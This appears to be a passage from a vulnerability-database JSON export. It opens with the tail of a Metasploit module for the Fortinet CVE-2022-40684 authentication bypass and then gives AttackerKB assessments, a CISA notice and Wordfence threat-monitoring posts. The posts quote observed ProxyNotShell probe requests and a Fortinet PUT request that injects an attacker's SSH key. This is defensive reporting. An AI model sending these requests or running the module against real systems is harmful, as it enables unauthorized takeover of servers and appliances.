Net::SSH::Disconnect, ::EOFError\n fail_with(Failure::Disconnected, 'Timed out during negotiation')\n rescue Net::SSH::AuthenticationFailed\n fail_with(Failure::NoAccess, 'Failed authentication')\n rescue Net::SSH::Exception => e\n fail_with(Failure::Unknown, \"SSH Error: #{e.class} : #{e.message}\")\n end\n\n fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket\n end\n\n def exploit\n print_status(\"Executing exploit on #{datastore['RHOST']}:#{datastore['RPORT']} target user: #{username}\")\n add_ssh_key\n vprint_status('Establishing SSH connection')\n ssh_options = ssh_client_defaults.merge({\n auth_methods: ['publickey'],\n key_data: [ ssh_private_key ],\n port: ssh_rport\n })\n ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG']\n\n do_login(ssh_options)\n\n handler(ssh_socket)\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/fortinet_authentication_bypass_cve_2022_40684.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "attackerkb": [{"lastseen": "2023-03-02T23:31:59", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at January 10, 2023 2:58pm UTC reported:\n\nCVE-2022-41082, also known as ProxyNotShell is an authenticated RCE in Microsoft Exchange. ProxyNotShell actually combines CVE-2022-41082 and CVE-2022-41040 for the whole attack chain. This CVE specifically however is the RCE component. The vulnerability is a deserialization flaw in Microsoft Exchange\u2019s PSRP backend. The PSRP backend can be accessed by an authenticated attacker leveraging the SSRF flaw identified as CVE-2022-41040. The deserialization gadget was documented by ZDI in their [blog](<https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend>). 
While this vulnerability affected Exchange Server 2013 and Exchange Server 2016, the gadget chain only worked with Exchange Server 2019 (version 15.2+). A new gadget chain could potentially be developed to exploit these older versions.\n\nGTSC originally announced on September 28th that they had seen a new (at the time) 0-day attack against their customers using Microsoft Exchange. On November 8th, Microsoft released patches for the two vulnerabilities. Between September 28th and November, no public exploits combined the SSRF with the RCE. Private threat actors however were attempting to exploit the vulnerability which led Microsoft to issue Exchange Emergency Mitigation Service (EEMS) mitigations. These mitigations took the form of IIS rewrite rules which were able to be bypassed using encoding techniques. The last issued EEMS mitigation was able to be successfully bypassed by using IBM037v1 encoding, which can be demonstrated using the [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/17275>).\n\nSuccessful code execution results in OS commands running as NT AUTHORITY\\SYSTEM. 
The exploit is reliable to exploit and pretty quick (compared to ProxyShell which needed to gather a lot of information).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T00:00:00", "type": "attackerkb", "title": "CVE-2022-41082", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-11-08T00:00:00", "id": "AKB:B18222FB-1EF5-4D55-899B-61BD7ECF0FAA", "href": "https://attackerkb.com/topics/tzpl7qr8m1/cve-2022-41082", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-06T17:35:32", "description": "An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 allows an unauthenticated attacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at October 14, 2022 9:39pm UTC reported:\n\nA vulnerability lets you send requests to the backend API service that appear to be coming from a trusted frontend application. As a result, you can call any REST API without authentication, which is pretty bad considering this is a security appliance.\n\n**carlosevieira** at October 10, 2022 5:26pm UTC reported:\n\nA vulnerability lets you send requests to the backend API service that appear to be coming from a trusted frontend application. 
As a result, you can call any REST API without authentication, which is pretty bad considering this is a security appliance.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-19T00:00:00", "type": "attackerkb", "title": "CVE-2022-40684", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388", "CVE-2022-40684", "CVE-2022-41352"], "modified": "2022-10-19T00:00:00", "id": "AKB:288E3CA7-1388-488A-81D9-E93EDFFAA221", "href": "https://attackerkb.com/topics/QWOxGIKkGx/cve-2022-40684", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-26T14:20:53", "description": "Improper validation of some components used by the rollback mechanism in Trend Micro Apex One and Trend Micro Apex One as a Service clients could allow an Apex One server administrator to instruct affected clients to download an unverified rollback package, which could lead to remote code execution. 
Please note: an attacker must first obtain Apex One server administration console access in order to exploit this vulnerability.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-19T00:00:00", "type": "attackerkb", "title": "CVE-2022-40139", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-40139"], "modified": "2022-09-19T00:00:00", "id": "AKB:C3925834-0CCF-4765-9D28-EB57DD180308", "href": "https://attackerkb.com/topics/NDnVyP5B2b/cve-2022-40139", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-08T08:02:38", "description": "Zoho ManageEngine Password Manager Pro before 12101 and PAM360 before 5510 are vulnerable to unauthenticated remote code execution. (This also affects ManageEngine Access Manager Plus before 4303 with authentication.)\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 25, 2022 5:15pm UTC reported:\n\nThis was an interesting vulnerability first found by Vinicius, and which then had a nice writeup on how to exploit it published by Y4er at <https://xz.aliyun.com/t/11578>. 
It was subsequently patched by Zoho and the patch can be found at <https://archives2.manageengine.com/passwordmanagerpro/12101/ManageEngine_PasswordManager_Pro_12100_to_12101.ppm>, whilst the advisory can be found at <https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html>.\n\nBy sending an XML-RPC serialized message via a POST request to the `/xmlrpc` endpoint as an unauthenticated user, the specs of which can be found at <http://xmlrpc.com/spec.md>, it is possible to gain RCE as the `SYSTEM` user that Zoho Password Manager runs as. Note that the name of the method being called does not have to be valid, and the name of the parameter passed to that method also does not have to be valid. All that matters is that the value of the parameter is marked as a serializable object that is Base64 encoded. This can be seen in the Metasploit module at <https://github.com/rapid7/metasploit-framework/pull/16852/files#diff-eaa6a1c5246f1059f414cda95a9c5c4e3e1d0adc4373ce64f7165fefe7576ec6R129-R157>\n\nAdditionally, since the target will also respond with `Failed to read result object: null` if you send the endpoint an empty string and it's vulnerable to deserialization attacks, it makes it really easy to put together a full exploit for this vulnerability that not only can check if the target is vulnerable but can also reliably exploit it. The last step was to use the CommonsBeanutils1 deserialization chain and then supply the command we want to execute and boom, we can go from an unauthenticated user to SYSTEM remotely and without authentication.\n\nNow what are the implications of this? Well it depends on the product. In the case of ManageEngine Access Manager Plus you need authentication to exploit this issue which may negate some of the risk, however one still needs to consider that successful exploitation will result in high privileged user access. 
However with Zoho ManageEngine Password Manager Pro and PAM360, no authentication is needed yet you will still get very high privileged user access.\n\nSecondly one needs to consider the position of where these products will be placed in the network. Zoho ManageEngine Password Manager Pro will likely be internally facing as there is likely not a need to make it externally accessible, or if it is it will be accessible via a VPN. On the other hand ManageEngine Access Manager Plus and PAM360 are access management solutions so it is feasible, particularly in the world of remote work that we live in today, that these solutions would be accessible over the internet.\n\nIn the worst-case scenario this would mean an unauthenticated attacker could potentially connect to a target server remotely over the internet, and with no authentication get SYSTEM level access on that server, which will also be controlling sensitive operations via access management controls, or will be holding user\u2019s passwords, which could then be used to gain further access into the target network.\n\nMore realistically though is the scenario that these are internally facing and an internal attacker uses this vulnerability to gain control over access management software to avoid detection or grant themselves access to sensitive resources, or steals passwords to gain further access into the target network.\n\nIn either case the risk of this vulnerability is quite high and given the incredibly easy exploitation of this issue combined with known exploited in the wild activity, this should be patched as soon as possible and you should investigate your servers for any suspicious activity if you haven\u2019t patched already.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-19T00:00:00", "type": "attackerkb", "title": "CVE-2022-35405", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-35405"], "modified": "2022-11-08T00:00:00", "id": "AKB:7734F7C5-D029-4C2D-9E33-DEBEABF4E7FF", "href": "https://attackerkb.com/topics/9IKNFYh9Wl/cve-2022-35405", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-26T11:04:54", "description": "An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 15.6.1 and iPadOS 15.6.1, macOS Monterey 12.5.1. An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-24T00:00:00", "type": "attackerkb", "title": "CVE-2022-32894", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-32894"], "modified": "2022-11-03T00:00:00", "id": "AKB:A0C8E5E1-E212-4D46-97F4-2C5A5F8F05F2", "href": "https://attackerkb.com/topics/dGRSfxvIvH/cve-2022-32894", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-18T20:06:15", "description": "Windows COM+ Event System Service Elevation of Privilege Vulnerability.\n\n \n**Recent assessments:** \n 
\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-11T00:00:00", "type": "attackerkb", "title": "CVE-2022-41033", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41033"], "modified": "2022-10-11T00:00:00", "id": "AKB:C27C2E8E-E83A-4BF5-A465-C31AC3D7B61B", "href": "https://attackerkb.com/topics/00rqTmp3LP/cve-2022-41033", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-07T17:29:35", "description": "Microsoft Exchange Server Elevation of Privilege Vulnerability.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T00:00:00", "type": "attackerkb", "title": "CVE-2022-41040", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": "2022-11-08T00:00:00", "id": "AKB:9EA74C88-E0C0-4B13-802D-551307F35B3F", "href": "https://attackerkb.com/topics/jd9xHGqW3a/cve-2022-41040", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-24T23:07:24", "description": "A code injection vulnerability in the User Portal and Webadmin allows a remote attacker to 
execute code in Sophos Firewall version v19.0 MR1 and older.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-23T00:00:00", "type": "attackerkb", "title": "CVE-2022-3236", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-3236"], "modified": "2022-09-23T00:00:00", "id": "AKB:9BEA97BB-44E8-4F50-B014-1DF399424D7C", "href": "https://attackerkb.com/topics/UWv8nSk6YL/cve-2022-3236", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa": [{"lastseen": "2022-10-03T13:58:18", "description": "Microsoft has released [Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). According to the blog post, \u201cMicrosoft is aware of limited targeted attacks using the two vulnerabilities to get into users\u2019 systems.\u201d The two vulnerabilities are CVE-2022-41040 and CVE-2022-41082, affecting on-premises Microsoft Exchange Server 2013, 2016, and 2019. **Note:** Microsoft Exchange Online is not affected. 
\n\nAn attacker could exploit these vulnerabilities to take control of an affected system.\n\nCISA encourages users and administrators to review the following information from Microsoft and apply the necessary mitigations until patches are made available:\n\n * [Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>)\n * [Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082](<https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>)\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/09/30/microsoft-releases-guidance-zero-day-vulnerabilities-microsoft>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T00:00:00", "type": "cisa", "title": "Microsoft Releases Guidance on Zero-Day Vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-01T00:00:00", "id": "CISA:8ED5E84007437E9B88D2418732B63E04", "href": 
"https://us-cert.cisa.gov/ncas/current-activity/2022/09/30/microsoft-releases-guidance-zero-day-vulnerabilities-microsoft", "cvss": {"score": 0.0, "vector": "NONE"}}], "wordfence": [{"lastseen": "2022-10-19T17:09:20", "description": "The Wordfence Threat Intelligence team has been monitoring exploit attempts targeting two zero-day vulnerabilities in Microsoft Exchange Server tracked as CVE-2022-41040 and CVE-2022-41082, collectively known as ProxyNotShell. These vulnerabilities are actively being exploited in the wild. At the time of writing, we have observed 1,658,281 exploit attempts across our network of 4 million protected websites.\n\nGiven that a quick Shodan search shows 214,671 hosts running Exchange, this is not an insignificant vulnerability. Fortunately, tracking exploit attempts has been made easy due to the similarities to the ProxyShell vulnerability from 2021. From the time we began tracking ProxyNotShell, we have observed 3,543 IP addresses across 365 hosts sending requests that are attempting to probe for and exploit the vulnerabilities.\n\nFor more details on ProxyNotShell and the data we have collected, continue reading below or [download a PDF of this post here](<https://www.wordfence.com/wp-content/uploads/2022/10/Two-Weeks-of-Monitoring-ProxyNotShell-CVE-2022-41040-CVE-2022-41082-Threat-Activity-post.pdf>).\n\nThe following top 20 IP addresses are responsible for 313,011 of the tracked exploit attempts.\n\nLooking at the IP addresses being logged, it quickly becomes apparent that a large number of the IP addresses are part of the same CIDR range of 
192.241.192.0/19. Nearly one-third of our logged requests probing and targeting this vulnerability come from these IP addresses, which are assigned to DigitalOcean. This means that Digitalocean\u2019s ASN is hosting nearly 3 times as many IPs sending requests targeting this vulnerability compared to the next most active host.\n\n\n\nWhile DigitalOcean is a legitimate virtual and dedicated server provider with a high reputation, it is still the source of many of the requests we have tracked. Threat actors often look for affordable solutions to quickly spin up an attack campaign, and in this case it appears that at least one threat actor either chose to use DigitalOcean as their provider or purchased access to a number of compromised servers on their network.\n\nMany of the requests we have observed thus far utilize GET requests to discover if the target is a vulnerable Exchange server. The requests we are seeing follow a few basic variations ranging from a basic `GET /autodiscover/autodiscover.json?%40zdi%2FPowershell= HTTP/1.1` to more complex requests like `GET /autodiscover/autodiscover.json?a%40foo_var%2Fowa%2F=&Email=autodiscover%2Fautodiscover.json%3Fa%40foo.var&Protocol=XYZ&FooProtocol=Powershell HTTP/1.1`. The second request example is an early proof-of-concept that has been used widely since its public release. If this looks familiar, that\u2019s because it is the same as the ProxyShell vulnerability exploit.\n\nThe user-agent also has a number of variations, primarily one reused from the user-agent for Firefox 105 on Windows 10. 
The top ten user-agent strings can be seen here:\n\n * User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0\n * Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0\n * Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)\n * Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36\n * Fuzz Faster U Fool v1.5.0-dev\n * Amazon CloudFront\n * User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 X-Middleton/1\n * Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.17\n * curl/7.79.1\n * Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36\n\n\n\nThe top user-agent also appears with the most common request we are seeing, which can be seen in the request header below.\n\n`GET /autodiscover/autodiscover.json?a%40foo_var%2Fowa%2F=&Email=autodiscover%2Fautodiscover.json%3Fa%40foo.var&Protocol=XYZ&FooProtocol=Powershell HTTP/1.1` \n`Geoip-Addr: 91.245.255.98` \n`Connection: close` \n`Accept: */*` \n`Accept-Encoding: gzip, deflate` \n`User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0` \n`Host: <redacted>`\n\nWhile the above GET request has been observed in 224,794 requests, it is used with multiple variations of request headers, though there are some consistencies in the query string. 
All of the requests are GET requests, are probing /autodiscover/autodiscover.json, and use Powershell, which are requirements to exploit this vulnerability.\n\n`GET /autodiscover/autodiscover.json?a%40foo_var%2Fowa%2F=&Email=autodiscover%2Fautodiscover.json%3Fa%40foo.var&Protocol=XYZ&FooProtocol=Powershell HTTP/1.1` \n`User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0` \n`Accept: */*` \n`Accept-Encoding: gzip, deflate` \n`Connection: keep-alive` \n`Host: www.<redacted>.com`\n\nAs mentioned previously, the user-agent primarily being observed is Google Chrome on Windows 10, however despite that, we have observed a number of user-agent request headers that include MacOS user-agents, such as this header that includes an older user-agent for Firefox 76 on MacOS Mojave. In fact, this was the second-largest user-agent observed, with 35,811 requests logged.\n\n`GET /autodiscover/autodiscover.json@Powershell.dewd79hxlu.com/owa/www.google.com HTTP/1.1` \n`Accept-Encoding: gzip` \n`Connection: close` \n`Host: <redacted>:443` \n`Referer: https://<redacted>:443/autodiscover/autodiscover.json@Powershell.dewd79hxlu.com/owa/www.google.com` \n`User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0`\n\nWhile less common, we are also seeing more complicated GET requests as well as more distinctive user-agents. The following request shows an attempt to exploit the ProxyNotShell vulnerabilities on a university website, using an open-source web fuzzer known as Fuzz Faster U Fool, which we see reflected in the user-agent string. This is one example of a logged exploit attempt that could either be the university\u2019s security team probing for the vulnerability to ensure any security holes are closed, or a threat actor probing for vulnerabilities to exploit. 
However, as this request was aimed at the website and not an Exchange server, it is more likely that this was an attempt by a threat actor to identify a vulnerability for the purpose of exploiting it.\n\n`GET /autodiscover/autodiscover.json?aa%40mail_<redacted>_edu_v6_6ipl9gf1rbdde8jlvh33c0t1tszjnbb0_<redacted>_com%2Fowa%2F%3F=&Email=autodiscover%2Fautodiscover.json%3Fa%40mail.<redacted>.edu.v6.6ipl9gf1rbdde8jlvh33c0t1tszjnbb0.<redacted>.com&Protocol=Autodiscoverv1&mail_<redacted>_edu_v6_euctlor93jplqgvt7pfbo85950brzin7_<redacted>_com=&protocol=Powershell HTTP/1.1` \n`Accept-Encoding: gzip` \n`Host: mail.<redacted>.edu` \n`User-Agent: Fuzz Faster U Fool v1.5.0-dev` \n`X-Https: 1`\n\nAs with ProxyShell, the ProxyNotShell exploit used on a vulnerable Exchange server can lead to remote code execution (RCE) on the server. This could lead to full takeover of a vulnerable server. The good news is that unlike ProxyShell, ProxyNotShell requires the threat actor to be authenticated with a real email address in order to exploit the vulnerability.\n\nThe Wordfence Intelligence IP Threat Feed will show new IP addresses attacking CVE-2022-41040 and CVE-2022-41082 in the \u201crce\u201d category as the feed is updated every 60 minutes.\n\nThe post [Two Weeks of Monitoring ProxyNotShell (CVE-2022-41040 & CVE-2022-41082) Threat Activity](<https://www.wordfence.com/blog/2022/10/two-weeks-of-monitoring-proxynotshell-threat-activity/>) appeared first on [Wordfence](<https://www.wordfence.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-19T16:01:59", "type": "wordfence", "title": "Two Weeks of 
Monitoring ProxyNotShell (CVE-2022-41040 & CVE-2022-41082) Threat Activity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-19T16:01:59", "id": "WORDFENCE:035A383C0D3B38D6EEBF9FE95D1A356D", "href": "https://www.wordfence.com/blog/2022/10/two-weeks-of-monitoring-proxynotshell-threat-activity/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-20T22:06:40", "description": "This morning, the Wordfence Threat Intelligence team began tracking exploit attempts targeting CVE-2022-40684 on our network of over 4 million protected websites. CVE-2022-40684 is a critical authentication bypass vulnerability in the administrative interface of Fortinet\u2019s FortiGate firewalls, FortiProxy web proxies, and FortiSwitch Manager, and is being actively exploited in the wild\u00b9,\u00b2.\n\nAt the time of publishing, we have recorded several exploit attempts and requests originating from the following IP addresses:\n\nMost of the requests we have observed are GET requests presumably trying to determine whether a Fortinet appliance is in place:\n\n`GET /api/v2/cmdb/system/admin/admin HTTP/1.1 \nAccept-Encoding: gzip \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 \nConnection: close \nX-Forwarded-Proto: https \nX-Forwarded-Ssl: on \nX-Forwarded-For: 75.128.217.136 \nHost: <redacted> \nContent-Type: application/x-www-form-urlencoded`\n\nHowever, we also found that a number of these IPs are also sending out PUT requests matching the recently 
released proof of concept, referenced at the end of this advisory, which attempts to update the public SSH key of the admin user:\n\n`PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 \nX-Forwarded-For: 172.104.6.178 \nAccept-Encoding: gzip \nForwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000; \nConnection: close \nUser-Agent: Report Runner \nHost: <redacted> \nContent-Type: application/json \nContent-Length: 610`\n\n` \n{ \n\"Ssh-public-key1\":\"\\\"ssh-rsa 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 dev@devs-MacBook-Pro.local\\\"\" \n}`\n\nWhile some requests are using a fake public key, which may indicate a benign vulnerability scanner, all of the requests using a valid public key are using the same public key, indicating that these requests are all the work of the same actor. An attacker able to update or add a valid public SSH key to a user\u2019s account on a system can then typically gain access to that system as that user if they have the corresponding private key. In this case the attacker is attempting to add their own public key to the admin user\u2019s account.\n\nThe SSH key has the following fingerprint: `SHA256:GBl4Pytt+W2yEZ3zlOkAZkgtqmTPBcEZlqK4hoNOqBU dev@devs-MacBook-Pro.local (RSA)`\n\nAll of the `PUT` exploit attempts we have seen are using the \u201cReport Runner\u201d User-Agent as this is a requirement of the exploit, though the exploit may also be viable with the User-Agent set to \u201cNode.js\u201d.\n\nNew IP Addresses attacking CVE-2022-40684 will appear on the [Wordfence Intelligence](<https://www.wordfence.com/products/wordfence-intelligence/>) IP Threat Feed in the \u201cauth_bypass\u201d category as the feed is updated every 60 minutes.\n\n1\\. Fortinet released an advisory [with additional information](<https://www.fortiguard.com/psirt/FG-IR-22-377>), including affected products and workarounds for users unable to patch. \n2\\. 
